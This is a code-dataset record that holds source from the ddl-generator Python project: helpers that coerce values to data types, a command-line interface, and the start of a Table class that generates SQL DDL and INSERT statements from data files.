>>> best_coercable((7, 21.4, 'ruining everything'))
'ruining everything' | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L215-L247 | [
"def coerce_to_specific(datum):\n \"\"\"\n Coerces datum to the most specific data type possible\n Order of preference: datetime, boolean, integer, decimal, float, string\n\n >>> coerce_to_specific('-000000001854.60')\n Decimal('-1854.60')\n >>> coerce_to_specific(7.2)\n Decimal('7.2')\n >>>... | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
return hasattr(x, 'lower') or not hasattr(x, '__iter__')
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
    """
    Coerces datum to the most specific data type possible
    Order of preference: datetime, boolean, integer, decimal, float, string

    >>> coerce_to_specific('-000000001854.60')
    Decimal('-1854.60')
    >>> coerce_to_specific(7.2)
    Decimal('7.2')
    >>> coerce_to_specific("Jan 17 2012")
    datetime.datetime(2012, 1, 17, 0, 0)
    >>> coerce_to_specific("something else")
    'something else'
    >>> coerce_to_specific("20141010")
    datetime.datetime(2014, 10, 10, 0, 0)
    >>> coerce_to_specific("001210107")
    1210107
    >>> coerce_to_specific("010")
    10
    """
    if datum is None:
        return None
    # 1. datetime -- dateutil parses very aggressively, so sanity-filter hits.
    try:
        result = dateutil.parser.parse(datum)
        # but even if this does not raise an exception, may
        # not be a date -- dateutil's parser is very aggressive
        # check for nonsense unprintable date
        str(result)
        # most false date hits will be interpreted as times today
        # or as unlikely far-future or far-past years
        clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
        if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
            digits = _digits_only.search(clean_datum)
            # Digit-only strings are only plausible dates at these lengths
            # (YYYY, YYMMDD, YYYYMMDD, and timestamp-like forms).
            if (not digits) or (len(digits.group(0)) not in
                                (4, 6, 8, 12, 14, 17)):
                raise Exception("false date hit for %s" % datum)
            if result.date() == datetime.datetime.now().date():
                raise Exception("false date hit (%s) for %s" % (
                    str(result), datum))
            if not (1700 < result.year < 2150):
                raise Exception("false date hit (%s) for %s" % (
                    str(result), datum))
        return result
    except Exception as e:
        # Any failure (parse error or our own "false hit" rejection) means
        # the datum is not a date; fall through to the other coercions.
        pass
    # 2. boolean
    if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
        return False
    elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
        return True
    # 3. integer
    try:
        return int(str(datum))
    except ValueError:
        pass
    # 4. decimal (preferred over float to preserve exactness)
    try:
        return Decimal(str(datum))
    except InvalidOperation:
        pass
    # 5. float
    try:
        return float(str(datum))
    except ValueError:
        pass
    # 6. fall back to plain string
    return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
    """
    Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
    and enough < 0 digits (scale) to accomodate numbers like either.

    >>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
    Decimal('999.999')
    """
    def places(d):
        # (digits before the decimal point, digits after it)
        tup = d.as_tuple()
        return (len(tup.digits) + tup.exponent, max(-tup.exponent, 0))
    (b4_1, after_1) = places(d1)
    (b4_2, after_2) = places(d2)
    int_part = '9' * max(b4_1, b4_2)
    frac_part = '9' * max(after_1, after_2)
    return Decimal(int_part + '.' + frac_part)
def set_worst(old_worst, new_worst):
    """
    Pad new_worst with zeroes to prevent it being shorter than old_worst.

    >>> set_worst(311920, '48-49')
    '48-490'
    >>> set_worst(98, -2)
    -20
    """
    # Booleans are never padded.
    if isinstance(new_worst, bool):
        return new_worst
    # Remember the sign before stripping it for the length comparison.
    was_negative = ((hasattr(old_worst, '__neg__') and old_worst < 0)
                    or (hasattr(new_worst, '__neg__') and new_worst < 0))
    try:
        old_worst = abs(old_worst)
        new_worst = abs(new_worst)
    except TypeError:
        pass  # non-numeric values keep their original form
    target_len = len(str(old_worst))
    if len(str(new_worst)) < target_len:
        # Pad on the right with zeroes, preserving new_worst's type.
        original_type = type(new_worst)
        new_worst = original_type(str(new_worst).ljust(target_len, '0'))
    if was_negative:
        try:
            new_worst = -abs(new_worst)
        except:
            pass
    return new_worst
def best_representative(d1, d2):
    """
    Given two objects each coerced to the most specific type possible, return the one
    of the least restrictive type.

    >>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
    Decimal('-99.9999')
    >>> best_representative(None, Decimal('6.1'))
    Decimal('6.1')
    >>> best_representative(311920, '48-49')
    '48-490'
    >>> best_representative(6, 'foo')
    'foo'
    >>> best_representative(Decimal('4.95'), Decimal('6.1'))
    Decimal('9.99')
    >>> best_representative(Decimal('-1.9'), Decimal('6.1'))
    Decimal('-9.9')
    """
    # Blank strings and Nones never win over a real value.
    if hasattr(d2, 'strip') and not d2.strip():
        return d1
    if d1 is None:
        return d2
    elif d2 is None:
        return d1
    # Types listed from most to least restrictive; the higher index wins.
    preference = (datetime.datetime, bool, int, Decimal, float, str)
    worst_pref = 0
    worst = ''
    for coerced in (d1, d2):
        pref = preference.index(type(coerced))
        if pref > worst_pref:
            # Less restrictive type wins outright (padded via set_worst).
            worst_pref = pref
            worst = set_worst(worst, coerced)
        elif pref == worst_pref:
            # Same type: keep whichever value needs the most room.
            if isinstance(coerced, Decimal):
                worst = set_worst(worst, worst_decimal(coerced, worst))
            elif isinstance(coerced, float):
                worst = set_worst(worst, max(coerced, worst))
            else: # int, str
                if len(str(coerced)) > len(str(worst)):
                    worst = set_worst(worst, coerced)
    return worst
def sqla_datatype_for(datum):
    """
    Given a scalar Python value, picks an appropriate SQLAlchemy data type.

    >>> sqla_datatype_for(7.2)
    DECIMAL(precision=2, scale=1)
    >>> sqla_datatype_for("Jan 17 2012")
    <class 'sqlalchemy.sql.sqltypes.DATETIME'>
    >>> sqla_datatype_for("something else")
    Unicode(length=14)
    """
    # Only trust dateutil's aggressive parser for strings that contain at
    # least two date-like separators ('-', '.', ' ', '/').
    try:
        if len(_complex_enough_to_be_date.findall(datum)) > 1:
            dateutil.parser.parse(datum)
            return sa.DATETIME
    except (TypeError, ValueError):
        pass
    # Numeric values get a DECIMAL sized by precision_and_scale; anything
    # non-numeric raises TypeError there and falls through to Unicode.
    try:
        (prec, scale) = precision_and_scale(datum)
        return sa.DECIMAL(prec, scale)
    except TypeError:
        # Size the Unicode column to this sample's length.
        return sa.Unicode(len(datum))
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/typehelpers.py | sqla_datatype_for | python | def sqla_datatype_for(datum):
try:
if len(_complex_enough_to_be_date.findall(datum)) > 1:
dateutil.parser.parse(datum)
return sa.DATETIME
except (TypeError, ValueError):
pass
try:
(prec, scale) = precision_and_scale(datum)
return sa.DECIMAL(prec, scale)
except TypeError:
return sa.Unicode(len(datum)) | Given a scalar Python value, picks an appropriate SQLAlchemy data type.
>>> sqla_datatype_for(7.2)
DECIMAL(precision=2, scale=1)
>>> sqla_datatype_for("Jan 17 2012")
<class 'sqlalchemy.sql.sqltypes.DATETIME'>
>>> sqla_datatype_for("something else")
Unicode(length=14) | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/typehelpers.py#L249-L270 | [
"def precision_and_scale(x):\n \"\"\"\n From a float, decide what precision and scale are needed to represent it.\n\n >>> precision_and_scale(54.2)\n (3, 1)\n >>> precision_and_scale(9)\n (1, 0)\n\n Thanks to Mark Ransom,\n http://stackoverflow.com/questions/3018758/determine-precision-and-s... | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Various functions for examining data types.
"""
import datetime
from decimal import Decimal, InvalidOperation
import doctest
import math
import re
import sqlalchemy as sa
import dateutil.parser
def is_scalar(x):
    """True for strings and for non-iterable values; False for other iterables."""
    string_like = hasattr(x, 'lower')
    iterable = hasattr(x, '__iter__')
    return string_like or not iterable
def precision_and_scale(x):
"""
From a float, decide what precision and scale are needed to represent it.
>>> precision_and_scale(54.2)
(3, 1)
>>> precision_and_scale(9)
(1, 0)
Thanks to Mark Ransom,
http://stackoverflow.com/questions/3018758/determine-precision-and-scale-of-particular-number-in-python
"""
if isinstance(x, Decimal):
precision = len(x.as_tuple().digits)
scale = -1 * x.as_tuple().exponent
if scale < 0:
precision -= scale
scale = 0
return (precision, scale)
max_digits = 14
int_part = int(abs(x))
magnitude = 1 if int_part == 0 else int(math.log10(int_part)) + 1
if magnitude >= max_digits:
return (magnitude, 0)
frac_part = abs(x) - int_part
multiplier = 10 ** (max_digits - magnitude)
frac_digits = multiplier + int(multiplier * frac_part + 0.5)
while frac_digits % 10 == 0:
frac_digits /= 10
scale = int(math.log10(frac_digits))
return (magnitude + scale, scale)
_complex_enough_to_be_date = re.compile(r"[\-\. /]")
_digits_only = re.compile(r"^\d+$")
def coerce_to_specific(datum):
"""
Coerces datum to the most specific data type possible
Order of preference: datetime, boolean, integer, decimal, float, string
>>> coerce_to_specific('-000000001854.60')
Decimal('-1854.60')
>>> coerce_to_specific(7.2)
Decimal('7.2')
>>> coerce_to_specific("Jan 17 2012")
datetime.datetime(2012, 1, 17, 0, 0)
>>> coerce_to_specific("something else")
'something else'
>>> coerce_to_specific("20141010")
datetime.datetime(2014, 10, 10, 0, 0)
>>> coerce_to_specific("001210107")
1210107
>>> coerce_to_specific("010")
10
"""
if datum is None:
return None
try:
result = dateutil.parser.parse(datum)
# but even if this does not raise an exception, may
# not be a date -- dateutil's parser is very aggressive
# check for nonsense unprintable date
str(result)
# most false date hits will be interpreted as times today
# or as unlikely far-future or far-past years
clean_datum = datum.strip().lstrip('-').lstrip('0').rstrip('.')
if len(_complex_enough_to_be_date.findall(clean_datum)) < 2:
digits = _digits_only.search(clean_datum)
if (not digits) or (len(digits.group(0)) not in
(4, 6, 8, 12, 14, 17)):
raise Exception("false date hit for %s" % datum)
if result.date() == datetime.datetime.now().date():
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
if not (1700 < result.year < 2150):
raise Exception("false date hit (%s) for %s" % (
str(result), datum))
return result
except Exception as e:
pass
if str(datum).strip().lower() in ('0', 'false', 'f', 'n', 'no'):
return False
elif str(datum).strip().lower() in ('1', 'true', 't', 'y', 'yes'):
return True
try:
return int(str(datum))
except ValueError:
pass
try:
return Decimal(str(datum))
except InvalidOperation:
pass
try:
return float(str(datum))
except ValueError:
pass
return str(datum)
def _places_b4_and_after_decimal(d):
"""
>>> _places_b4_and_after_decimal(Decimal('54.212'))
(2, 3)
"""
tup = d.as_tuple()
return (len(tup.digits) + tup.exponent, max(-1*tup.exponent, 0))
def worst_decimal(d1, d2):
"""
Given two Decimals, return a 9-filled decimal representing both enough > 0 digits
and enough < 0 digits (scale) to accomodate numbers like either.
>>> worst_decimal(Decimal('762.1'), Decimal('-1.983'))
Decimal('999.999')
"""
(d1b4, d1after) = _places_b4_and_after_decimal(d1)
(d2b4, d2after) = _places_b4_and_after_decimal(d2)
return Decimal('9' * max(d1b4, d2b4) + '.' + '9' * max(d1after, d2after))
def set_worst(old_worst, new_worst):
"""
Pad new_worst with zeroes to prevent it being shorter than old_worst.
>>> set_worst(311920, '48-49')
'48-490'
>>> set_worst(98, -2)
-20
"""
if isinstance(new_worst, bool):
return new_worst
# Negative numbers confuse the length calculation.
negative = ( (hasattr(old_worst, '__neg__') and old_worst < 0) or
(hasattr(new_worst, '__neg__') and new_worst < 0) )
try:
old_worst = abs(old_worst)
new_worst = abs(new_worst)
except TypeError:
pass
# now go by length
new_len = len(str(new_worst))
old_len = len(str(old_worst))
if new_len < old_len:
new_type = type(new_worst)
new_worst = str(new_worst).ljust(old_len, '0')
new_worst = new_type(new_worst)
# now put the removed negative back
if negative:
try:
new_worst = -1 * abs(new_worst)
except:
pass
return new_worst
def best_representative(d1, d2):
"""
Given two objects each coerced to the most specific type possible, return the one
of the least restrictive type.
>>> best_representative(Decimal('-37.5'), Decimal('0.9999'))
Decimal('-99.9999')
>>> best_representative(None, Decimal('6.1'))
Decimal('6.1')
>>> best_representative(311920, '48-49')
'48-490'
>>> best_representative(6, 'foo')
'foo'
>>> best_representative(Decimal('4.95'), Decimal('6.1'))
Decimal('9.99')
>>> best_representative(Decimal('-1.9'), Decimal('6.1'))
Decimal('-9.9')
"""
if hasattr(d2, 'strip') and not d2.strip():
return d1
if d1 is None:
return d2
elif d2 is None:
return d1
preference = (datetime.datetime, bool, int, Decimal, float, str)
worst_pref = 0
worst = ''
for coerced in (d1, d2):
pref = preference.index(type(coerced))
if pref > worst_pref:
worst_pref = pref
worst = set_worst(worst, coerced)
elif pref == worst_pref:
if isinstance(coerced, Decimal):
worst = set_worst(worst, worst_decimal(coerced, worst))
elif isinstance(coerced, float):
worst = set_worst(worst, max(coerced, worst))
else: # int, str
if len(str(coerced)) > len(str(worst)):
worst = set_worst(worst, coerced)
return worst
def best_coercable(data):
    """
    Given an iterable of scalar data, returns the datum representing the most specific
    data type the list overall can be coerced into, preferring datetimes, then bools,
    then integers, then decimals, then floats, then strings.

    >>> best_coercable((6, '2', 9))
    6
    >>> best_coercable((Decimal('6.1'), 2, 9))
    Decimal('6.1')
    >>> best_coercable(('2014 jun 7', '2011 may 2'))
    datetime.datetime(2014, 6, 7, 0, 0)
    >>> best_coercable((7, 21.4, 'ruining everything'))
    'ruining everything'
    """
    # Types listed from most to least restrictive; the least restrictive
    # type seen across the data wins.
    preference = (datetime.datetime, bool, int, Decimal, float, str)
    worst_pref = 0
    worst = ''
    for datum in data:
        coerced = coerce_to_specific(datum)
        pref = preference.index(type(coerced))
        if pref > worst_pref:
            worst_pref = pref
            worst = coerced
        elif pref == worst_pref:
            # Same type: keep the value that needs the most room.
            if isinstance(coerced, Decimal):
                worst = worst_decimal(coerced, worst)
            elif isinstance(coerced, float):
                worst = max(coerced, worst)
            else: # int, str
                if len(str(coerced)) > len(str(worst)):
                    worst = coerced
    return worst
if __name__ == '__main__':
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
|
catherinedevlin/ddl-generator | ddlgenerator/console.py | generate_one | python | def generate_one(tbl, args, table_name=None, file=None):
table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
loglevel=args.log, limit=args.limit)
if args.dialect.startswith('sqla'):
if not args.no_creates:
print(table.sqlalchemy(), file=file)
if args.inserts:
print("\n".join(table.inserts(dialect=args.dialect)), file=file)
elif args.dialect.startswith('dj'):
table.django_models()
else:
print(table.sql(dialect=args.dialect, inserts=args.inserts,
creates=(not args.no_creates), drops=args.drops,
metadata_source=args.use_metadata_from), file=file)
return table | Prints code (SQL, SQLAlchemy, etc.) to define a table. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L51-L70 | null | import argparse
import logging
import re
try:
from ddlgenerator.ddlgenerator import Table, dialect_names
from ddlgenerator.ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator.ddlgenerator import emit_db_sequence_updates
except ImportError:
from ddlgenerator import Table, dialect_names, sqla_head # TODO: can py2/3 split this
from ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator import emit_db_sequence_updates
# If anyone can explain these import differences to me, I will buy you a cookie.
from data_dispenser import sqlalchemy_table_sources
parser = argparse.ArgumentParser(description='Generate DDL based on data')
parser.add_argument('dialect', help='SQL dialect to output', type=str.lower)
parser.add_argument('datafile', help='Path to file storing data (accepts .yaml, .json)', nargs='+')
parser.add_argument('-k', '--key', help='If primary key needed, name it this', type=str.lower)
parser.add_argument('--force-key', help='Force every table to have a primary key',
action='store_true')
parser.add_argument('-r', '--reorder', help='Reorder fields alphabetically, ``key`` first',
action='store_true')
parser.add_argument('-u', '--uniques', action='store_true',
help='Include UNIQUE constraints where data is unique')
parser.add_argument('-t', '--text', action='store_true',
help='Use variable-length TEXT columns instead of VARCHAR')
parser.add_argument('-d', '--drops', action='store_true', help='Include DROP TABLE statements')
parser.add_argument('-i', '--inserts', action='store_true', help='Include INSERT statements')
parser.add_argument('--no-creates', action='store_true', help='Do not include CREATE TABLE statements')
parser.add_argument('--limit', type=int, default=None, help='Max number of rows to read from each source file')
parser.add_argument('-c', '--cushion', type=int, default=0, help='Extra length to pad column sizes with')
parser.add_argument('--save-metadata-to', type=str, metavar='FILENAME',
help='Save table definition in FILENAME for later --use-saved-metadata run')
parser.add_argument('--use-metadata-from', type=str, metavar='FILENAME',
help='Use metadata saved in FROM for table definition, do not re-analyze table structure')
parser.add_argument('-l', '--log', type=str.upper,
help='log level (CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN)', default='WARN')
def set_logging(args):
    """Set the root logger's level from ``args.log``.

    ``args.log`` must name a numeric stdlib logging level ('CRITICAL',
    'FATAL', 'ERROR', 'DEBUG', 'INFO', 'WARN'); anything else raises
    NotImplementedError.
    """
    try:
        loglevel = int(getattr(logging, args.log))
    except (AttributeError, TypeError) as err:
        # getattr fails for unknown names; int() fails if the name resolves
        # to a non-numeric attribute of the logging module.  Chain the cause
        # explicitly (the original bound it to an unused variable).
        raise NotImplementedError(
            'log level "%s" not one of CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN'
            % args.log) from err
    logging.getLogger().setLevel(loglevel)
is_sqlalchemy_url = re.compile("^%s" % "|".join(dialect_names))
def generate(args=None, namespace=None, file=None):
    """
    Generate DDL from data sources named.

    :args: String or list of strings to be parsed for arguments
    :namespace: Namespace to extract arguments from
    :file: Write to this open file object (default stdout)
    """
    if hasattr(args, 'split'):
        args = args.split()
    args = parser.parse_args(args, namespace)
    set_logging(args)
    logging.info(str(args))
    # Normalize dialect aliases to their canonical names.
    if args.dialect in ('pg', 'pgsql', 'postgres'):
        args.dialect = 'postgresql'
    if args.dialect.startswith('dj'):
        args.dialect = 'django'
    elif args.dialect.startswith('sqla'):
        args.dialect = 'sqlalchemy'
    if args.dialect not in dialect_names:
        raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
    if args.dialect == 'sqlalchemy':
        print(sqla_head, file=file)
    for datafile in args.datafile:
        if is_sqlalchemy_url.search(datafile):
            # A database URL: emit one table per table found in the source DB.
            # BUGFIX: initialize ``t`` so an empty database does not raise
            # NameError at the ``if t and args.inserts`` check below.
            t = None
            table_names_for_insert = []
            for tbl in sqlalchemy_table_sources(datafile):
                t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
                if t.data:
                    table_names_for_insert.append(tbl.generator.name)
            if args.inserts and args.dialect == 'sqlalchemy':
                print(sqla_inserter_call(table_names_for_insert), file=file)
            if t and args.inserts:
                # Advance DB sequences past the inserted primary-key values.
                for seq_update in emit_db_sequence_updates(t.source.db_engine):
                    if args.dialect == 'sqlalchemy':
                        print(' conn.execute("%s")' % seq_update, file=file)
                    elif args.dialect == 'postgresql':
                        print(seq_update, file=file)
        else:
            generate_one(datafile, args, file=file)
|
catherinedevlin/ddl-generator | ddlgenerator/console.py | generate | python | def generate(args=None, namespace=None, file=None):
if hasattr(args, 'split'):
args = args.split()
args = parser.parse_args(args, namespace)
set_logging(args)
logging.info(str(args))
if args.dialect in ('pg', 'pgsql', 'postgres'):
args.dialect = 'postgresql'
if args.dialect.startswith('dj'):
args.dialect = 'django'
elif args.dialect.startswith('sqla'):
args.dialect = 'sqlalchemy'
if args.dialect not in dialect_names:
raise NotImplementedError('First arg must be one of: %s' % ", ".join(dialect_names))
if args.dialect == 'sqlalchemy':
print(sqla_head, file=file)
for datafile in args.datafile:
if is_sqlalchemy_url.search(datafile):
table_names_for_insert = []
for tbl in sqlalchemy_table_sources(datafile):
t = generate_one(tbl, args, table_name=tbl.generator.name, file=file)
if t.data:
table_names_for_insert.append(tbl.generator.name)
if args.inserts and args.dialect == 'sqlalchemy':
print(sqla_inserter_call(table_names_for_insert), file=file)
if t and args.inserts:
for seq_update in emit_db_sequence_updates(t.source.db_engine):
if args.dialect == 'sqlalchemy':
print(' conn.execute("%s")' % seq_update, file=file)
elif args.dialect == 'postgresql':
print(seq_update, file=file)
else:
generate_one(datafile, args, file=file) | Genereate DDL from data sources named.
:args: String or list of strings to be parsed for arguments
:namespace: Namespace to extract arguments from
:file: Write to this open file object (default stdout) | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/console.py#L72-L112 | [
"def set_logging(args):\n try:\n loglevel = int(getattr(logging, args.log))\n except (AttributeError, TypeError) as e:\n raise NotImplementedError('log level \"%s\" not one of CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN' %\n args.log)\n logging.getLogger().setLe... | import argparse
import logging
import re
try:
from ddlgenerator.ddlgenerator import Table, dialect_names
from ddlgenerator.ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator.ddlgenerator import emit_db_sequence_updates
except ImportError:
from ddlgenerator import Table, dialect_names, sqla_head # TODO: can py2/3 split this
from ddlgenerator import sqla_head, sqla_inserter_call
from ddlgenerator import emit_db_sequence_updates
# If anyone can explain these import differences to me, I will buy you a cookie.
from data_dispenser import sqlalchemy_table_sources
parser = argparse.ArgumentParser(description='Generate DDL based on data')
parser.add_argument('dialect', help='SQL dialect to output', type=str.lower)
parser.add_argument('datafile', help='Path to file storing data (accepts .yaml, .json)', nargs='+')
parser.add_argument('-k', '--key', help='If primary key needed, name it this', type=str.lower)
parser.add_argument('--force-key', help='Force every table to have a primary key',
action='store_true')
parser.add_argument('-r', '--reorder', help='Reorder fields alphabetically, ``key`` first',
action='store_true')
parser.add_argument('-u', '--uniques', action='store_true',
help='Include UNIQUE constraints where data is unique')
parser.add_argument('-t', '--text', action='store_true',
help='Use variable-length TEXT columns instead of VARCHAR')
parser.add_argument('-d', '--drops', action='store_true', help='Include DROP TABLE statements')
parser.add_argument('-i', '--inserts', action='store_true', help='Include INSERT statements')
parser.add_argument('--no-creates', action='store_true', help='Do not include CREATE TABLE statements')
parser.add_argument('--limit', type=int, default=None, help='Max number of rows to read from each source file')
parser.add_argument('-c', '--cushion', type=int, default=0, help='Extra length to pad column sizes with')
parser.add_argument('--save-metadata-to', type=str, metavar='FILENAME',
help='Save table definition in FILENAME for later --use-saved-metadata run')
parser.add_argument('--use-metadata-from', type=str, metavar='FILENAME',
help='Use metadata saved in FROM for table definition, do not re-analyze table structure')
parser.add_argument('-l', '--log', type=str.upper,
help='log level (CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN)', default='WARN')
def set_logging(args):
try:
loglevel = int(getattr(logging, args.log))
except (AttributeError, TypeError) as e:
raise NotImplementedError('log level "%s" not one of CRITICAL, FATAL, ERROR, DEBUG, INFO, WARN' %
args.log)
logging.getLogger().setLevel(loglevel)
is_sqlalchemy_url = re.compile("^%s" % "|".join(dialect_names))
def generate_one(tbl, args, table_name=None, file=None):
    """
    Prints code (SQL, SQLAlchemy, etc.) to define a table.

    :tbl: data source (file path, SQLAlchemy table source, raw data, ...)
    :args: parsed argument namespace controlling dialect and output options
    :table_name: explicit table name; inferred from the source if omitted
    :file: open file object to print to (default stdout)

    Returns the constructed ``Table`` so callers can reuse its metadata.
    """
    table = Table(tbl, table_name=table_name, varying_length_text=args.text, uniques=args.uniques,
                  pk_name = args.key, force_pk=args.force_key, reorder=args.reorder, data_size_cushion=args.cushion,
                  save_metadata_to=args.save_metadata_to, metadata_source=args.use_metadata_from,
                  loglevel=args.log, limit=args.limit)
    if args.dialect.startswith('sqla'):
        if not args.no_creates:
            print(table.sqlalchemy(), file=file)
        if args.inserts:
            print("\n".join(table.inserts(dialect=args.dialect)), file=file)
    elif args.dialect.startswith('dj'):
        # django_models() does its own printing.
        table.django_models()
    else:
        print(table.sql(dialect=args.dialect, inserts=args.inserts,
                        creates=(not args.no_creates), drops=args.drops,
                        metadata_source=args.use_metadata_from), file=file)
    return table
|
catherinedevlin/ddl-generator | ddlgenerator/ddlgenerator.py | emit_db_sequence_updates | python | def emit_db_sequence_updates(engine):
if engine and engine.name == 'postgresql':
# not implemented for other RDBMS; necessity unknown
conn = engine.connect()
qry = """SELECT 'SELECT last_value FROM ' || n.nspname ||
'.' || c.relname || ';' AS qry,
n.nspname || '.' || c.relname AS qual_name
FROM pg_namespace n
JOIN pg_class c ON (n.oid = c.relnamespace)
WHERE c.relkind = 'S'"""
for (qry, qual_name) in list(conn.execute(qry)):
(lastval, ) = conn.execute(qry).first()
nextval = int(lastval) + 1
yield "ALTER SEQUENCE %s RESTART WITH %s;" % (qual_name, nextval) | Set database sequence objects to match the source db
Relevant only when generated from SQLAlchemy connection.
Needed to avoid subsequent unique key violations after DB build. | train | https://github.com/catherinedevlin/ddl-generator/blob/db6741216d1e9ad84b07d4ad281bfff021d344ea/ddlgenerator/ddlgenerator.py#L557-L575 | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Given data, automatically guess-generates DDL to create SQL tables.
Invoke with one table's worth of data at a time, from command line::
$ ddlgenerator postgresql sourcedata.yaml
The ``-i`` flag generates INSERT statements as well::
$ ddlgenerator -i postgresql sourcedata.yaml
or from Python::
>>> menu = Table('../tests/menu.json')
>>> ddl = menu.ddl('postgresql')
>>> inserts = menu.inserts('postgresql')
>>> all_sql = menu.sql('postgresql', inserts=True)
Use ``-k <keyname>`` or ``--key=<keyname>`` to set ``keyname`` as the table's
primary key. If the field does not exist, it will be added. If ``-k`` is not given,
no primary key will be created, *unless* it is required to set up child tables
(split out from sub-tables nested inside the original data).
You will need to hand-edit the resulting SQL to add indexes.
You can use wildcards to generate from multiple files at once::
$ ddlgenerator postgresql "*.csv"
Remember to enclose the file path in quotes to prevent the shell
from expanding the argument (if it does, ddlgenerator will run
against each file *separately*, setting up one table for each).
"""
from collections import OrderedDict
import copy
import datetime
from decimal import Decimal
import doctest
import logging
import os.path
import pprint
import re
import textwrap
import sqlalchemy as sa
from sqlalchemy.schema import CreateTable
import dateutil.parser
import yaml
try:
import pymongo
except ImportError:
pymongo = None
from data_dispenser.sources import Source
try:
import ddlgenerator.typehelpers as th
from ddlgenerator import reshape
except ImportError:
import typehelpers as th # TODO: can py2/3 split this
import reshape
logging.basicConfig(filename='ddlgenerator.log', filemode='w')
metadata = sa.MetaData()
class KeyAlreadyExists(KeyError):
pass
dialect_names = '''drizzle firebird mssql mysql oracle postgresql
sqlite sybase sqlalchemy django'''.split()
def _dump(sql, *multiparams, **params):
pass
mock_engines = {}
for engine_name in ('postgresql', 'sqlite', 'mysql', 'oracle', 'mssql'):
mock_engines[engine_name] = sa.create_engine('%s://' % engine_name,
strategy='mock',
executor=_dump)
class Table(object):
"""
>>> data = '''
... -
... name: Lancelot
... kg: 69.4
... dob: 9 jan 461
... -
... name: Gawain
... kg: 69.4 '''
>>> print(Table(data, "knights").ddl('postgresql').strip())
DROP TABLE IF EXISTS knights;
<BLANKLINE>
CREATE TABLE knights (
name VARCHAR(8) NOT NULL,
kg DECIMAL(3, 1) NOT NULL,
dob TIMESTAMP WITHOUT TIME ZONE,
UNIQUE (name),
UNIQUE (dob)
);
"""
table_index = 0
def _find_table_name(self, data):
    """Derive ``self.table_name`` when none was supplied.

    Uses the MongoDB collection name or a data file's basename when
    available, else a ``generated_table<N>`` placeholder.  The result is
    always cleaned for use as an SQL identifier, and the class-wide
    counter is advanced on every call.
    """
    if not self.table_name:
        if pymongo and isinstance(data, pymongo.collection.Collection):
            self.table_name = data.name
        elif hasattr(data, 'lower'): # duck-type string test
            if os.path.isfile(data):
                # Name the table after the file, minus path and extension.
                (file_path, file_extension) = os.path.splitext(data)
                self.table_name = os.path.split(file_path)[1].lower()
    self.table_name = self.table_name or \
                      'generated_table%s' % Table.table_index
    self.table_name = reshape.clean_key_name(self.table_name)
    Table.table_index += 1
def __init__(self, data, table_name=None, default_dialect=None,
save_metadata_to=None, metadata_source=None,
varying_length_text=False, uniques=False,
pk_name=None, force_pk=False, data_size_cushion=0,
_parent_table=None, _fk_field_name=None, reorder=False,
loglevel=logging.WARN, limit=None):
"""
Initialize a Table and load its data.
If ``varying_length_text`` is ``True``,
text columns will be TEXT rather than VARCHAR.
This *improves* performance in PostgreSQL.
If a ``metadata<timestamp>`` YAML file generated
from a previous ddlgenerator run is
provided, *only* ``INSERT`` statements will be produced,
and the table structure
determined during the previous run will be assumed.
"""
self.source = data
logging.getLogger().setLevel(loglevel)
self.varying_length_text = varying_length_text
self.table_name = table_name
self.data_size_cushion = data_size_cushion
self._find_table_name(data)
